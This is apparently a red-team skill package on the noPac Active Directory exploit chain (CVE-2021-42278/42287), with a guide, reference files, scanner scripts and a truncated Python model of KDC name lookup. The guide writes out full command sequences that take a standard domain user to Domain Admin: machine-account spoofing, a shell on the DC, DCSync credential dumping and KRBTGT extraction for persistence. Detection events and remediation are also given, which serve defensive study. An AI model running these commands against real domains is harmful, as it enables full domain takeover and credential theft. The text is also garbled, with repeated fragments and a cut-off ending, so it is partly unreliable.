Exploiting noPac (CVE-2021-42278 / CVE-2021-42287) Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws. Overview noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 second…

-computer-pass 'AttackPass123' \\\n -dc-ip 10.10.10.1 domain.local/user:'Password123'\n ```\n2. Clear the SPN and rename sAMAccountName:\n ```bash\n # Rename machine account sAMAccountName to DC name (without $)\n renameMachine.py -current-name 'ATTACKPC

-new-name 'DC01' \\\n -dc-ip 10.10.10.1 domain.local/user:'Password123'\n ```\n3. Request a TGT for the spoofed name:\n ```bash\n getTGT.py -dc-ip 10.10.10.1 domain.local/'DC01':'AttackPass123'\n ```\n4. Restore the original machine name:\n ```bash\n renameMachine.py -current-name 'DC01' -new-name 'ATTACKPC

\\\n -dc-ip 10.10.10.1 domain.local/user:'Password123'\n ```\n5. Use S4U2self for impersonation:\n ```bash\n export KRB5CCNAME=DC01.ccache\n getST.py -self -impersonate 'administrator' -altservice 'cifs/DC01.domain.local' \\\n -k -no-pass -dc-ip 10.10.10.1 domain.local/'ATTACKPC

\n ```\n\n## Tools and Resources\n\n| Tool | Purpose | Platform |\n|------|---------|----------|\n| noPac (cube0x0) | Automated scanner and exploiter | Python |\n| noPac (Ridter) | Alternative exploit implementation | Python |\n| Impacket | Kerberos ticket manipulation, DCSync | Python |\n| CrackMapExec | Vulnerability scanning module | Python |\n| Rubeus | Windows Kerberos ticket operations | Windows (.NET) |\n| secretsdump.py | Post-exploitation credential dumping | Python |\n\n## CVE Details\n\n| CVE | Description | CVSS | Patch |\n|-----|-------------|------|-------|\n| CVE-2021-42278 | sAMAccountName spoofing (machine accounts) | 7.5 | KB5008102 |\n| CVE-2021-42287 | KDC PAC confusion / privilege escalation | 7.5 | KB5008380 |\n\n## Detection Signatures\n\n| Indicator | Detection Method |\n|-----------|-----------------|\n| Machine account sAMAccountName change | Event 4742 (computer account changed) with sAMAccountName modification |\n| New machine account creation | Event 4741 (computer object created) |\n| TGT request for account without trailing $ | Kerberos audit log analysis |\n| S4U2self requests from non-DC machine accounts | Event 4769 with unusual service ticket requests |\n| Rapid sequence: create account, rename, request TGT | SIEM correlation rule for noPac attack pattern |\n\n## Validation Criteria\n\n- [ ] Domain scanned for noPac vulnerability\n- [ ] MachineAccountQuota verified (default 10)\n- [ ] Exploit executed successfully (shell or DCSync)\n- [ ] Domain Admin privileges obtained from standard user\n- [ ] DCSync performed to dump domain credentials\n- [ ] KRBTGT hash obtained for persistence validation\n- [ ] Attack chain documented with timestamps\n- [ ] Patch status verified (KB5008380, KB5008602)\n---","attachment_filenames":["assets/template.md","references/api-reference.md","references/standards.md","references/workflows.md","scripts/agent.py","scripts/process.py"],"attachments":[{"filename":"assets/template.md","content":"# noPac 
Exploitation Report Template\n\n## Target Information\n\n| Field | Value |\n|-------|-------|\n| Domain | |\n| DC Hostname | |\n| DC IP | |\n| Initial User | |\n| MachineAccountQuota | |\n| Patch Level | KB5008380 / KB5008602 |\n\n## Exploitation Steps\n\n| Step | Action | Result | Timestamp |\n|------|--------|--------|-----------|\n| 1 | Vulnerability scan | Vulnerable / Not Vulnerable | |\n| 2 | Machine account creation | Success / Failed | |\n| 3 | sAMAccountName spoofing | Success / Failed | |\n| 4 | TGT request | Ticket obtained / Failed | |\n| 5 | S4U2self impersonation | DA ticket / Failed | |\n| 6 | DCSync | Hashes dumped / Failed | |\n\n## Remediation\n\n| Action | Priority | Status |\n|--------|----------|--------|\n| Apply KB5008380 | Critical | |\n| Apply KB5008602 | Critical | |\n| Set MachineAccountQuota to 0 | High | |\n| Monitor Event 4741/4742 | Medium | |\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":864,"content_sha256":"a27a5d1849c4e21b247a1815d6fc508895461e689ca0143110ce493e8a200653"},{"filename":"references/api-reference.md","content":"# API Reference: noPac (CVE-2021-42278/42287)\n\n## Vulnerability Overview\n\n### CVE-2021-42278 — sAMAccountName Spoofing\nAllows renaming a machine account's sAMAccountName to match a DC name (without trailing $).\n\n### CVE-2021-42287 — KDC Confusion\nKDC fails to verify PAC when sAMAccountName doesn't match, granting DC-level TGT.\n\n### Attack Chain\n1. Create machine account (MachineAccountQuota > 0)\n2. Rename machine sAMAccountName to DC name (e.g., DC01)\n3. Request TGT for spoofed name\n4. Rename back to original\n5. 
Request S4U2Self — KDC returns ticket as DC$\n\n## noPac.py (Impacket)\n\n### Scan for Vulnerability\n```bash\nnoPac.py domain.local/user:password -dc-ip 10.10.10.1 --scan\n```\n\n### Exploit (Get Shell)\n```bash\nnoPac.py domain.local/user:password -dc-ip 10.10.10.1 \\\n -use-ldap -shell\n```\n\n### Dump Hashes\n```bash\nnoPac.py domain.local/user:password -dc-ip 10.10.10.1 \\\n -use-ldap -dump\n```\n\n## Prerequisites\n\n### MachineAccountQuota\n```powershell\n# Check quota\n([ADSI]\"LDAP://DC=domain,DC=local\").\"ms-DS-MachineAccountQuota\"\n# Default: 10 (any domain user can create 10 machine accounts)\n```\n\n### LDAP Query\n```ldap\n(&(objectClass=domain)(ms-DS-MachineAccountQuota>=1))\n```\n\n## Detection\n\n### Event IDs\n| Event | Log | Description |\n|-------|-----|-------------|\n| 4741 | Security | Computer account created |\n| 4742 | Security | Computer account changed |\n| 4743 | Security | Computer account deleted |\n| 4781 | Security | Account renamed |\n| 4768 | Security | TGT requested |\n\n### Detection Query\n```kql\nSecurityEvent\n| where EventID == 4781\n| where TargetUserName !endswith \"$\"\n| where TargetUserName in (\"DC01\", \"DC02\")\n```\n\n## Patch Information\n\n### Microsoft KB\n| KB | Description |\n|----|-------------|\n| KB5008380 | November 2021 patch |\n| KB5008602 | OOB patch |\n| KB5008207 | Cumulative update |\n\n## Remediation\n1. Apply KB5008380 patch\n2. Set MachineAccountQuota to 0\n3. Monitor Event 4741 and 4781 for anomalies\n4. 
Enable PAC validation on all DCs\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":1983,"content_sha256":"14b96081e0cf7ce84d8c4f735077adba49f5690286c287632d574a85950615b7"},{"filename":"references/standards.md","content":"# Standards and References - noPac CVE-2021-42278/42287\n\n## MITRE ATT&CK References\n\n| Technique ID | Name | Tactic |\n|-------------|------|--------|\n| T1068 | Exploitation for Privilege Escalation | Privilege Escalation |\n| T1136.002 | Create Account: Domain Account | Persistence |\n| T1078.002 | Valid Accounts: Domain Accounts | Initial Access |\n| T1558 | Steal or Forge Kerberos Tickets | Credential Access |\n| T1003.006 | OS Credential Dumping: DCSync | Credential Access |\n\n## CVE References\n\n- CVE-2021-42278: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42278\n- CVE-2021-42287: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42287\n- Microsoft KB5008380: November 2021 Kerberos PAC fix\n- Microsoft KB5008602: November 2021 sAMAccountName fix\n\n## Key Research\n\n- CrowdStrike: noPac Exploit - Latest Microsoft AD Flaw\n- Fortinet: From User to Domain Admin in 60 Seconds\n- TrustedSec: Attack Path Mapping Approach to CVEs 2021-42287/42278\n- cube0x0 noPac: https://github.com/cube0x0/noPac\n- Ridter noPac: https://github.com/Ridter/noPac\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":1075,"content_sha256":"7e07c4ab32afb7b4a90f8ebbba824d8f736f81becabd2708d2c95fd25cb6cb2e"},{"filename":"references/workflows.md","content":"# Workflows - noPac Exploitation\n\n## Automated Exploitation Workflow\n\n```\n1. Scan → noPac scanner or CrackMapExec module\n2. Exploit → noPac.py with --impersonate administrator\n3. Access → Semi-interactive shell on DC or DCSync dump\n4. Persist → Extract KRBTGT hash for Golden Ticket\n```\n\n## Manual Exploitation Workflow\n\n```\n1. Create machine account (addcomputer.py)\n2. 
Rename sAMAccountName to DC name without $ (renameMachine.py)\n3. Request TGT for spoofed name (getTGT.py)\n4. Restore original name (renameMachine.py)\n5. S4U2self impersonation (getST.py)\n6. Use ticket for DCSync (secretsdump.py -k)\n```\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":615,"content_sha256":"9393cf8522354f3f3c15ba618b1ce1c8831d0965662c368bdeff383f8492012e"},{"filename":"scripts/agent.py","content":"#!/usr/bin/env python3\n\"\"\"Agent for detecting noPac (CVE-2021-42278/42287) AD privilege escalation vulnerability.\"\"\"\n\nimport argparse\nimport json\nimport subprocess\nimport sys\nfrom datetime import datetime, timezone\n\n\ndef check_nopac_impacket(domain, username, password, dc_ip):\n \"\"\"Check for noPac vulnerability using Impacket noPac.py.\"\"\"\n cmd = [\n \"noPac.py\", f\"{domain}/{username}:{password}\",\n \"-dc-ip\", dc_ip, \"--scan\",\n ]\n try:\n result = subprocess.check_output(\n cmd, text=True, errors=\"replace\", timeout=30\n )\n return {\n \"method\": \"noPac.py\",\n \"vulnerable\": \"VULNERABLE\" in result.upper() or \"success\" in result.lower(),\n \"output\": result[:1000],\n }\n except (subprocess.SubprocessError, FileNotFoundError):\n return {\"method\": \"noPac.py\", \"status\": \"tool not available\"}\n\n\ndef check_machineaccountquota(domain, username, password, dc_ip):\n \"\"\"Check the MachineAccountQuota via LDAP — needed for noPac.\"\"\"\n ps_cmd = (\n \"([ADSI]'LDAP://DC='+($env:USERDNSDOMAIN -replace '\\\\.',',DC=')).'ms-DS-MachineAccountQuota'\"\n )\n try:\n result = subprocess.check_output(\n [\"powershell\", \"-NoProfile\", \"-Command\", ps_cmd],\n text=True, errors=\"replace\", timeout=10\n )\n quota = int(result.strip()) if result.strip().isdigit() else -1\n return {\n \"machine_account_quota\": quota,\n \"exploitable\": quota > 0,\n \"note\": \"Quota > 0 means any domain user can create machine accounts\",\n }\n except (subprocess.SubprocessError, ValueError):\n return 
{\"machine_account_quota\": \"unknown\"}\n\n\ndef check_patch_status():\n \"\"\"Check if KB5008380 (noPac patch) is installed.\"\"\"\n if sys.platform != \"win32\":\n return {\"status\": \"non-windows\"}\n try:\n result = subprocess.check_output(\n [\"wmic\", \"qfe\", \"list\", \"brief\"],\n text=True, errors=\"replace\", timeout=15\n )\n patched = any(kb in result for kb in [\"KB5008380\", \"KB5008602\", \"KB5008207\"])\n return {\n \"patched\": patched,\n \"relevant_kbs\": [\"KB5008380\", \"KB5008602\", \"KB5008207\"],\n }\n except subprocess.SubprocessError:\n return {\"status\": \"check_failed\"}\n\n\ndef enumerate_sam_name_impersonation():\n \"\"\"Check for sAMAccountName impersonation conditions.\"\"\"\n ps_cmd = (\n \"Get-ADComputer -Filter * -Properties sAMAccountName | \"\n \"Where-Object {$_.sAMAccountName -notmatch '\\\\$'} | \"\n \"Select-Object Name,sAMAccountName | ConvertTo-Json\"\n )\n try:\n result = subprocess.check_output(\n [\"powershell\", \"-NoProfile\", \"-Command\", ps_cmd],\n text=True, errors=\"replace\", timeout=15\n )\n data = json.loads(result) if result.strip() else []\n return data if isinstance(data, list) else [data]\n except (subprocess.SubprocessError, json.JSONDecodeError):\n return []\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Detect noPac CVE-2021-42278/42287 vulnerability (authorized testing only)\"\n )\n parser.add_argument(\"--domain\", help=\"AD domain\")\n parser.add_argument(\"--username\", help=\"Domain username\")\n parser.add_argument(\"--password\", help=\"Domain password\")\n parser.add_argument(\"--dc-ip\", help=\"Domain controller IP\")\n parser.add_argument(\"--check-patch\", action=\"store_true\")\n parser.add_argument(\"--output\", \"-o\", help=\"Output JSON report\")\n args = parser.parse_args()\n\n print(\"[*] noPac (CVE-2021-42278/42287) Detection Agent\")\n print(\"[!] 
For authorized security testing only\")\n report = {\"timestamp\": datetime.now(timezone.utc).isoformat(), \"findings\": {}}\n\n if args.domain and args.username:\n nopac = check_nopac_impacket(\n args.domain, args.username, args.password or \"\", args.dc_ip or \"\"\n )\n report[\"findings\"][\"nopac_scan\"] = nopac\n print(f\"[*] noPac scan: {nopac.get('vulnerable', 'unknown')}\")\n\n quota = check_machineaccountquota(args.domain, args.username, args.password or \"\", args.dc_ip or \"\")\n report[\"findings\"][\"machine_quota\"] = quota\n\n if args.check_patch:\n patch = check_patch_status()\n report[\"findings\"][\"patch_status\"] = patch\n print(f\"[*] Patched: {patch.get('patched', 'unknown')}\")\n\n report[\"risk_level\"] = \"CRITICAL\" if any(\n v.get(\"vulnerable\") or v.get(\"exploitable\") for v in report[\"findings\"].values() if isinstance(v, dict)\n ) else \"LOW\"\n\n if args.output:\n with open(args.output, \"w\") as f:\n json.dump(report, f, indent=2)\n print(f\"[*] Report saved to {args.output}\")\n else:\n print(json.dumps(report, indent=2))\n\n\nif __name__ == \"__main__\":\n main()\n","content_type":"text/x-python; charset=utf-8","language":"python","size":4803,"content_sha256":"5e12e675e35963bc00633e952e36519493b9bc7f39c3297ea1b12d3de03f1fbe"},{"filename":"scripts/process.py","content":"#!/usr/bin/env python3\n\"\"\"\nnoPac Vulnerability Scanner and Assessment Script\n\nChecks Active Directory environments for CVE-2021-42278/42287 vulnerability\nby verifying patch status and MachineAccountQuota settings.\nFor authorized red team engagements only.\n\"\"\"\n\nimport subprocess\nimport sys\nimport json\nimport os\nfrom datetime import datetime\n\n\ndef check_machine_account_quota(dc_ip: str, domain: str, username: str, password: str) -> dict:\n \"\"\"Check MachineAccountQuota via LDAP query.\"\"\"\n try:\n result = subprocess.run(\n [\n \"python3\", \"-c\",\n f\"\"\"\nimport ldap3\nserver = ldap3.Server('{dc_ip}')\nconn = ldap3.Connection(server, 
'{domain}\\\\\\\\{username}', '{password}', auto_bind=True)\nconn.search('{\",\".join([\"DC=\" + p for p in domain.split(\".\")])}', '(objectClass=domain)',\n attributes=['ms-DS-MachineAccountQuota'])\nif conn.entries:\n print(conn.entries[0]['ms-DS-MachineAccountQuota'])\nelse:\n print('QUERY_FAILED')\n\"\"\"\n ],\n capture_output=True, text=True, timeout=30\n )\n quota = result.stdout.strip()\n return {\n \"status\": \"success\",\n \"quota\": int(quota) if quota.isdigit() else -1,\n \"exploitable\": int(quota) > 0 if quota.isdigit() else False\n }\n except Exception as e:\n return {\"status\": \"error\", \"error\": str(e)}\n\n\ndef run_nopac_scanner(dc_ip: str, domain: str, username: str, password: str) -> dict:\n \"\"\"Run noPac scanner to check vulnerability status.\"\"\"\n try:\n result = subprocess.run(\n [\"python3\", \"scanner.py\", f\"{domain}/{username}:{password}\", \"-dc-ip\", dc_ip],\n capture_output=True, text=True, timeout=60\n )\n output = result.stdout + result.stderr\n vulnerable = \"VULNERABLE\" in output.upper() or \"vulnerable\" in output.lower()\n return {\n \"status\": \"success\",\n \"vulnerable\": vulnerable,\n \"output\": output.strip()[:1000]\n }\n except FileNotFoundError:\n return {\"status\": \"error\", \"error\": \"noPac scanner not found. 
Clone from https://github.com/cube0x0/noPac\"}\n except Exception as e:\n return {\"status\": \"error\", \"error\": str(e)}\n\n\ndef generate_assessment_report(dc_ip: str, domain: str, quota_result: dict, scan_result: dict) -> str:\n \"\"\"Generate noPac vulnerability assessment report.\"\"\"\n report = [\n \"=\" * 60,\n \"noPac (CVE-2021-42278/42287) Vulnerability Assessment\",\n f\"Generated: {datetime.now().isoformat()}\",\n \"=\" * 60,\n \"\",\n f\"Target DC: {dc_ip}\",\n f\"Domain: {domain}\",\n \"\",\n \"[MachineAccountQuota Check]\",\n ]\n\n if quota_result[\"status\"] == \"success\":\n quota = quota_result[\"quota\"]\n report.append(f\" MachineAccountQuota: {quota}\")\n if quota > 0:\n report.append(f\" Status: EXPLOITABLE - Users can create up to {quota} machine accounts\")\n elif quota == 0:\n report.append(\" Status: MITIGATED - Machine account creation disabled\")\n else:\n report.append(\" Status: UNKNOWN - Could not determine quota\")\n else:\n report.append(f\" Error: {quota_result.get('error', 'Unknown error')}\")\n\n report.append(\"\")\n report.append(\"[noPac Scanner Result]\")\n if scan_result[\"status\"] == \"success\":\n status = \"VULNERABLE\" if scan_result[\"vulnerable\"] else \"NOT VULNERABLE\"\n report.append(f\" Status: {status}\")\n report.append(f\" Details: {scan_result['output'][:500]}\")\n else:\n report.append(f\" Error: {scan_result.get('error', 'Unknown error')}\")\n\n report.extend([\n \"\",\n \"[Remediation]\",\n \" 1. Apply KB5008380 (CVE-2021-42287 Kerberos PAC fix)\",\n \" 2. Apply KB5008602 (CVE-2021-42278 sAMAccountName fix)\",\n \" 3. Set MachineAccountQuota to 0:\",\n \" Set-ADDomain -Identity domain.local -Replace @{'ms-DS-MachineAccountQuota'='0'}\",\n \" 4. 
Monitor Event 4741 (machine account creation) and 4742 (modification)\",\n \"\",\n \"=\" * 60\n ])\n\n return \"\\n\".join(report)\n\n\ndef main():\n \"\"\"Main entry point.\"\"\"\n if len(sys.argv) \u003c 4:\n print(\"Usage: python process.py \u003cdc_ip> \u003cdomain> \u003cusername> \u003cpassword>\")\n print(\"Example: python process.py 10.10.10.1 domain.local user Password123\")\n return\n\n dc_ip = sys.argv[1]\n domain = sys.argv[2]\n username = sys.argv[3]\n password = sys.argv[4] if len(sys.argv) > 4 else \"\"\n\n print(f\"Checking noPac vulnerability for {domain} at {dc_ip}...\")\n quota_result = check_machine_account_quota(dc_ip, domain, username, password)\n scan_result = run_nopac_scanner(dc_ip, domain, username, password)\n\n report = generate_assessment_report(dc_ip, domain, quota_result, scan_result)\n print(report)\n\n report_file = f\"nopac_assessment_{datetime.now().strftime('%Y%m%d_%H%M%S')}.txt\"\n with open(report_file, \"w\") as f:\n f.write(report)\n print(f\"\\nReport saved to: {report_file}\")\n\n\nif __name__ == \"__main__\":\n main()\n","content_type":"text/x-python; charset=utf-8","language":"python","size":5056,"content_sha256":"e5a2f1d3b813fb38105588ea5ed675c875ae1720a1462b0fa152416746afd145"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"Exploiting noPac (CVE-2021-42278 / CVE-2021-42287)","type":"text"}]},{"type":"blockquote","content":[{"type":"paragraph","content":[{"text":"Legal Notice:","type":"text","marks":[{"type":"strong"}]},{"text":" This skill is for authorized security testing and educational purposes only. 
Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.","type":"text"}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Overview","type":"text"}]},{"type":"paragraph","content":[{"text":"noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 seconds. CVE-2021-42278 allows an attacker to modify a machine account's sAMAccountName attribute to match a Domain Controller's name (minus the trailing $). CVE-2021-42287 exploits a flaw in the Kerberos PAC validation where the KDC, unable to find the renamed account, falls back to appending $ and issues a ticket for the Domain Controller account. Microsoft patched both vulnerabilities in November 2021 (KB5008380 and KB5008602), but many environments remain unpatched. 
The exploit was publicly released by cube0x0 and Ridter in December 2021.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"When to Use","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"When performing authorized security testing that involves exploiting noPac (CVE-2021-42278/42287)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"When analyzing malware samples or attack artifacts in a controlled environment","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"When conducting red team exercises or penetration testing engagements","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"When building detection capabilities based on offensive technique understanding","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Prerequisites","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Familiarity with red teaming concepts and tools","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Access to a test or lab environment for safe execution","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Python 3.8+ with required dependencies installed","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Appropriate authorization for any testing activities","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Objectives","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Scan the target domain for noPac vulnerability (CVE-2021-42278/42287)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Create or leverage a machine account with 
modified sAMAccountName","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Exploit the KDC PAC confusion to obtain a TGT for the Domain Controller","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Use the DC ticket to perform DCSync and dump domain credentials","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Achieve Domain Admin access from a standard domain user account","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document the complete exploitation chain with evidence","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"MITRE ATT&CK Mapping","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"T1068","type":"text","marks":[{"type":"strong"}]},{"text":" - Exploitation for Privilege Escalation","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"T1136.002","type":"text","marks":[{"type":"strong"}]},{"text":" - Create Account: Domain Account","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"T1078.002","type":"text","marks":[{"type":"strong"}]},{"text":" - Valid Accounts: Domain Accounts","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"T1558","type":"text","marks":[{"type":"strong"}]},{"text":" - Steal or Forge Kerberos Tickets","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"T1003.006","type":"text","marks":[{"type":"strong"}]},{"text":" - OS Credential Dumping: DCSync","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Workflow","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Phase 1: Vulnerability 
Scanning","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Check if the domain is vulnerable using the noPac scanner:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Using cube0x0's noPac scanner\npython3 scanner.py domain.local/user:'Password123' -dc-ip 10.10.10.1\n\n# Using CrackMapExec module\ncrackmapexec smb 10.10.10.1 -u user -p 'Password123' -M nopac","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Verify the MachineAccountQuota (default is 10, allows any user to join computers):","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check MachineAccountQuota via LDAP\npython3 -c \"\nimport ldap3\nserver = ldap3.Server('10.10.10.1')\nconn = ldap3.Connection(server, 'domain.local\\\\user', 'Password123', auto_bind=True)\nconn.search('DC=domain,DC=local', '(objectClass=domain)', attributes=['ms-DS-MachineAccountQuota'])\nprint(conn.entries[0]['ms-DS-MachineAccountQuota'])\n\"","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Phase 2: Exploitation with noPac Tool","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Run the full noPac exploit chain:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Using cube0x0's noPac (gets a shell on the DC)\npython3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \\\n -dc-host DC01 -shell --impersonate administrator -use-ldap\n\n# Using Ridter's noPac (alternative implementation)\npython3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \\\n --impersonate administrator 
-dump","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"The exploit automatically:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Creates a new machine account (or uses an existing one)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Renames the machine account's sAMAccountName to match the DC (e.g., \"DC01\")","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Requests a TGT for the spoofed account name","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Restores the original sAMAccountName","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Uses S4U2self to obtain a service ticket impersonating the target user","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"The KDC finds no account matching \"DC01\" and falls back to \"DC01$\" (the real DC)","type":"text"}]}]}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Phase 3: Post-Exploitation","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"With the obtained Domain Controller ticket, perform DCSync:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# DCSync using secretsdump.py with the Kerberos ticket\nexport KRB5CCNAME=administrator.ccache\nsecretsdump.py -k -no-pass domain.local/[email protected]\n\n# Or directly through the noPac shell\n# The shell runs as SYSTEM on the DC","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Alternatively, obtain a semi-interactive shell:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 noPac.py 
domain.local/user:'Password123' -dc-ip 10.10.10.1 \\\n -dc-host DC01 -shell --impersonate administrator -use-ldap","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Phase 4: Manual Exploitation Steps","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Create a machine account:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"addcomputer.py -computer-name 'ATTACKPC

-computer-pass 'AttackPass123' \\\n -dc-ip 10.10.10.1 domain.local/user:'Password123'","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Clear the SPN and rename sAMAccountName:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Rename machine account sAMAccountName to DC name (without $)\nrenameMachine.py -current-name 'ATTACKPC

-new-name 'DC01' \\\n -dc-ip 10.10.10.1 domain.local/user:'Password123'","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Request a TGT for the spoofed name:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"getTGT.py -dc-ip 10.10.10.1 domain.local/'DC01':'AttackPass123'","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Restore the original machine name:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"renameMachine.py -current-name 'DC01' -new-name 'ATTACKPC

Exploiting noPac (CVE-2021-42278 / CVE-2021-42287) Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws. Overview noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 second…

\\\n -dc-ip 10.10.10.1 domain.local/user:'Password123'","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Use S4U2self for impersonation:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"export KRB5CCNAME=DC01.ccache\ngetST.py -self -impersonate 'administrator' -altservice 'cifs/DC01.domain.local' \\\n -k -no-pass -dc-ip 10.10.10.1 domain.local/'ATTACKPC
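What the KDC does with the ticket across steps 2 to 5, and why each of the two patches stops it, as an added example that is not part of the original skill, of Impacket, or of any noPac tool. It is a Python model of the name lookup, not Windows code: the directory, SIDs and ticket fields are constructed, and representing KB5008102 as a trailing-`$` check on computer renames and KB5008380 as a PAC_REQUESTOR SID comparison at the TGS exchange is an assumption about their effect, kept deliberately simple.

```python
"""Model of the KDC name resolution abused by noPac (added example, not the real KDC)."""
from dataclasses import dataclass
from typing import Optional


class KdcError(Exception):
    """Stands in for the KRB-ERROR / LDAP constraint violation a real DC returns."""


@dataclass
class Account:
    sam: str              # sAMAccountName as stored in the directory
    sid: str              # objectSid, the identity the PAC is actually built from
    is_dc: bool = False


@dataclass
class Tgt:
    cname: str                      # client name carried in the ticket
    requestor_sid: Optional[str]    # PAC_REQUESTOR (KB5008380); None on an unpatched KDC


def new_directory():
    """Constructed directory: one DC plus the attacker's freshly added machine account."""
    return {
        "DC01$": Account("DC01$", "S-1-5-21-1-1-1-1000", is_dc=True),
        "ATTACKPC$": Account("ATTACKPC$", "S-1-5-21-1-1-1-1105"),
    }


def rename_sam(directory, old, new, sam_hardened):
    """Rename a machine account (steps 2 and 4).

    CVE-2021-42278: an unpatched SAM accepts a computer sAMAccountName without
    the trailing '$'. The hardening (modelled here) rejects it.
    """
    if sam_hardened and not new.endswith("$"):
        raise KdcError("rename rejected: computer sAMAccountName must end with '$'")
    if new in directory:
        raise KdcError("rename rejected: name already exists")
    acct = directory.pop(old)
    acct.sam = new
    directory[new] = acct


def issue_tgt(directory, cname, pac_requestor):
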